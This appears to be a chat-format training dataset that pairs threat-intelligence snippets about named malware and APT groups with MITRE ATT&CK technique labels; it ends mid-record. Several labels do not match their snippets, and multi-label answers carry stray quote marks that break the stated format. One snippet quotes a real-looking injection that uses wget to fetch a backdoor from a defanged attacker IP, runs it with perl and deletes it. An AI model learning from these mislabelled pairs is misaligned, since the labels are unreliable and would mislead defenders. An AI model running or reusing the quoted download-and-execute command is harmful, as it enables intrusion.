- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DOGCALL is capable of capturing screenshots of the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky is a highly motivated threat actor targeting a number of entities in South Korea. This group has been relentlessly creating new infection chains to deliver different types of malware to their victims. Such targeted attacks can result in the leak of restricted research, unauthorized access for espionage and even destructive attacks against target organizations"
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When REvil was first discovered, it was delivered to targets via exploitation of Oracle WebLogic vulnerabilities. There are reports that the threat actors leveraged a strategic web compromise (SWC) to deliver REvil by compromising the Italian WinRAR . it website and replacing the WinRAR installation executable with an instance of the malware. The SWC resulted in the infection of unsuspecting WinRAR customers' systems. In other reports, threat actors breached at least three managed service providers (MSPs) and used the access to deploy REvil to the MSPs' customers. The diversity and complexity of delivery mechanisms employed by the REvil threat actors in a short period of time suggest a high level of sophistication"
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ixeshe can list file and directory information."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Amadey can identify the IP address of a victim machine."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Indeed, any decent firewall would block incoming packets to any ports that have not explicitly been opened for operational purposes. However, with Chaos using a raw socket, the backdoor can be triggered on ports running an existing legitimate service. As an example, a Webserver that would only expose SSH (22), HTTP (80) and HTTPS (443) would not be reachable via a traditional backdoor due to the fact that those services are in use, but with Chaos it becomes possible"
- },
- {
- "role": "assistant",
- "content": "T1205 - Traffic Signaling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ELMER uses HTTP for command and control."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "However, for version 3 things are different. This is how the report of the email_accounts_grabber module appears for Emotet version 3:"
- },
- {
- "role": "assistant",
- "content": "T1129 - Server Software Component', 'T1588.001 - Malware', 'T1586.002 - Email Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PcShare can execute `cmd` commands on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Before being hashed, the character “0” or “1” is appended to the return value indicating root privileges. This clientID is stored in /Library/Storage/File System/HFS/25cf5d02-e50b-4288-870a-528d56c3cf6e/pivtoken.appex if the code runs as root, or in ~/Library/SmartCardsServices/Technology/PlugIns/drivers/snippets.ecgML otherwise. This file is normally hidden via the _chflags function and its timestamp is modified using the “touch –t” command with a random value"
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mongall has relied on a user opening a malicious document for execution."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CoinTicker executes a Python script to download its second stage."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) The script uses the function fromCharCode() that returns a string created from a sequence of UTF-16 code units. By using this function, it avoids explicitly writing commands it wants to execute and it hides the actual code it is initiating. In particular, the script uses this function to hide information related to process names. To the best of our knowledge, this method was not used in early versions of the spam campaign. 2) The script uses the function radador(), which returns a randomized integer. This function is able to obfuscate code so that every iteration of the code is presented differently. In contrast to the first method of obfuscation, this has been used effectively since early versions of the Astaroth Trojan campaign"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Serving the backdoor Another HTTP request is sent to the targeted server, with the following resource: /?module=wget hxxp://67[.]209.177.163/ibus -O /tmp/e3ac24a0bcddfacd010a6c10f4a814bc The above standard injection pulls the ibus payload and stores it on /tmp/e3ac24a0bcddfacd010a6c10f4a814bc Launching the backdoor The execution is issued using an additional HTTP request: /?module=perl /tmp/ e3ac24a0bcddfacd010a6c10f4a814bc;sleep 2;rm -rf /tmp/ e3ac24a0bcddfacd010a6c10f4a814bc That executes the perl script, puts it to sleep for two seconds and deletes the file to remove any evidence"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion', 'T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ROKRAT can check for debugging tools."
- },
- {
- "role": "assistant",
- "content": "T1622 - Debugger Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The backdoor has the capability to download and upload files, execute shell commands, and update its configuration."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "C2 traffic has been encrypted with RC4 and AES."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has collected data and files from compromised networks."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Checking the DLLs related to iDefense SysAnalyzer, Microsoft Debugging DLL and Sandboxies - Calling IsDebuggerPresent and GetTickCount to identify a debugger - Checking VMWare related file"
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aquatic Panda has used WinRAR to compress memory dumps prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LAPSUS$ has gathered user identities and credentials to gain initial access to a victim's organization; the group has also called an organization's help desk to reset a target's credentials."
- },
- {
- "role": "assistant",
- "content": "T1589.001 - Credentials"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stuxnet uses a driver registered as a boot start service as the main load-point."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) NetPass.exe is a legitimate utility developed by NirSoft that recovers all network passwords stored on a system for the current logged-on user. This tool can also recover passwords stored in the credentials file of external drives. 3) WebBrowserPassView is a password recovery tool that captures passwords stored by Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera and passes them to the credential enumerator module. 4) Mail PassView is a password recovery tool that reveals passwords and account details for various email clients such as Microsoft Outlook, Windows Mail, Mozilla Thunderbird, Hotmail, Yahoo. Mail, and Gmail and passes them to the credential enumerator module. Once an available system is found, Emotet writes the service component on the system, which writes Emotet onto the disk. Emotet’s access to SMB can result in the infection of entire domains (servers and clients"
- },
- {
- "role": "assistant",
- "content": "T1552.001 - Unsecured Credentials: Credentials In Files"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can capture keystrokes on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emotet has been delivered by phishing emails containing attachments."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IcedID can inject itself into a suspended msiexec.exe process to send beacons to C2 while appearing as a normal msi application."
- },
- {
- "role": "assistant",
- "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Flame can record audio using any existing hardware recording devices."
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LazyScripter has used `mshta.exe` to execute Koadic stagers."
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SilverTerrier uses FTP for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.002 - File Transfer Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Functionally, Gauss is designed to collect as much information about infected systems as possible, as well as to steal credentials for various banking systems and social network, email and IM accounts. The Gauss code includes commands to intercept data required to work with several Lebanese banks – for instance, Bank of Beirut, Byblos Bank, and Fransabank."
- },
- {
- "role": "assistant",
- "content": "T1114 - Email Collection', 'T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Higaisa’s JavaScript file used a legitimate Microsoft Office 2007 package to side-load the \"OINFO12.OCX\" dynamic link library."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As part of the data reconnaissance phase, grabs the system time to send back to the control server."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Winnti for Windows has the ability to use encapsulated HTTP/S in C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Function for scrambling AES256 key in the outgoing packet Some screenshots taken during scrambling and encryption process: Figure 21. The highlighted bytes represent the scrambled computer info Figure 22. Randomly generated AES256 key Figure 23. Scrambled AES256 key (0xC1 XOR 0x13 = 0xD2, 0xD2 ROL 6 = 0xB4) etc.) Figure 24. Computer info encrypted with AES256 key Figure 25. Screenshot of the final payload to be sent to C&C server"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture', 'T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT19 uses a Port 22 malware variant to modify several Registry keys."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can communicate over a reverse proxy using SOCKS5."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Goopy has the ability to use cmd.exe to execute commands passed from an Outlook C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SILENTTRINITY can create a WMI Event to execute a payload for persistence."
- },
- {
- "role": "assistant",
- "content": "T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "22 Keylogging and exfiltrating data The exfiltrated data is base64 that decodes into more custom encoded strings that appear to be “/” delimited"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Here is the content of the file: /shellcode <90909090909090909090E800<...redacted…>4D2D6DC95CBD5DC1811111111111111> def <7B0D0A2756...redacted…>312067657420636C6F736566696C650D0A717569740D0A7D> token pop exch pop Exec The executed shellcode will first perform a decoding routine designed to download an additional payload from the internet"
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WhisperGate can pause for 20 seconds to bypass antivirus solutions."
- },
- {
- "role": "assistant",
- "content": "T1497.003 - Time Based Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "checks its parent process for indications that it is running in a sandbox setup."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the first campaign, the email (Figure 1) purported to be from FinCERT [8] with the subject “Памятка по информационной безопасности” (Information Security Notice) and contained a Microsoft Word attachment named “сводка1705.doc” (report1705) (Figure 3). - Another email (Figure 2) purported to be from Security Support for PCI-DSS [3] at a major credit card company with the subject line “Безопасность” (security) and a Microsoft Word attachment (Figure 4) “Требования безопасности.doc” (Safety requirements"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Both malicious programs share the code for LZMA compression algorithm. In CloudAtlas it is used to compress the logs and to decompress the decrypted payload from the C&C servers, while in Red October the “scheduler” plugin uses it to decompress executable payloads from the C&C"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT3 has used tools to compress data before exfilling it."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to enumerate files."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot can enumerate computers and network devices."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "actors have split RAR files for exfiltration into parts."
- },
- {
- "role": "assistant",
- "content": "T1030 - Data Transfer Size Limits"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Avaddon encrypts the victim system using a combination of AES256 and RSA encryption schemes."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Deriving C2 URLs from a Domain Generation Algorithm (DGA) using lists of domain names, subdomains, top-level domains (TLDs), Uniform Resource Identifiers (URIs), file names, and file extensions"
- },
- {
- "role": "assistant",
- "content": "T1568.002 - Domain Generation Algorithms"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PLAINTEE has downloaded and executed additional plugins."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has used the command line for execution."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete malware used FTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.002 - File Transfer Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The observed JSS Loader infection led to the download and execution of a setup VBScript from https[:]//petshopbook[.]com. This script installs a custom Sekur PS stager to %LOCALAPPDATA%\\Microsoft\\WindowsDefender\\ClearTemp.ps1 and establishes persistence for this stager with a second VBS that is launched by a scheduled task"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "menuPass has used a script (atexec.py) to execute a command on a target machine via Task Scheduler."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleSeed can disguise JavaScript files as PDFs."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bisonal has decoded strings in the malware using XOR and RC4."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Since it is a very long term group, some victims may be impossible to identify now"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Agent.btz obtains the victim username and saves it to a file."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has obtained specific Registry keys and values on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Patchwork hides base64-encoded and encrypted C2 server locations in comments on legitimate websites."
- },
- {
- "role": "assistant",
- "content": "T1102.001 - Dead Drop Resolver"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GrimAgent can enumerate the IP and domain of a target system."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has used a variety of public exploits, including CVE 2020-0688 and CVE 2020-17144, to gain execution on vulnerable Microsoft Exchange; they have also conducted SQL injection attacks against external websites."
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot creates a scheduled task on the system that provides persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot has gained execution through users opening malicious links."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Epic backdoors are commanded by a huge network of hacked servers that deliver command and control functionality"
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has established persistence by using the Registry option in PowerShell Empire to add a Run key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group used SSH and the PuTTy PSCP utility to gain access to a restricted segment of a compromised network."
- },
- {
- "role": "assistant",
- "content": "T1021.004 - Remote Services: SSH"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo uses JavaScript to get the system time."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
